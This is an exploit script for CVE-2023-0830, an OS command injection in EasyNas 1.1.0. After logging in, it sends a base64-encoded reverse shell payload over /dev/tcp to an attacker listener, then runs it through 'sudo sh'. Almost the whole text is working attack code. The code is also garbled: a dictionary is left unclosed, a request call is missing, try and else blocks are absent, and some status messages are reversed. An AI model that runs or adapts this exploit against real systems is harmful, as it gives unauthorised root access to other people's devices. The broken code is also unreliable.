# Exploit Title: EasyNas 1.1.0 - OS Command Injection
# Exploit Author: Ivan Spiridonov ([email protected])
# Author Blog:
# Version: 1.0.0
# Vendor home page :
# Authentication Required: Yes
# CVE : CVE-2023-0830


import requests
import sys
import base64
import urllib.parse
import time

from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Disable the insecure request warning

if len(sys.argv) < 6:
    print("Usage: ./ http(s)://url username password listenerIP listenerPort")

url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]

# Create the payload
payload = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(sys.argv[4], sys.argv[5])

# Encode the payload in base64
payload = base64.b64encode(payload.encode()).decode()

# URL encode the payload
payload = urllib.parse.quote(payload)

# Create the login data
login_data = {

# Create a session
session = requests.Session()

# Send the login request
print("Sending login request...")
login_response ="https://{url}/easynas/", data=login_data, verify=False)

# Check if the login was successful
if 'Login to EasyNAS' in login_response.text:
    print("Unsuccessful login")
    print("Login successful")

# send the exploit request
timeout = 3

    exploit_response = session.get(f'https://{url}/easynas/{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23', headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout = timeout, verify=False)
    if exploit_response.status_code != 200:
        print("[+] Everything seems ok, check your listener.")
        print("[-] Exploit failed, system is patched or credentials are wrong.")

except requests.exceptions.ReadTimeout:
    print("[-] Everything seems ok, check your listener.")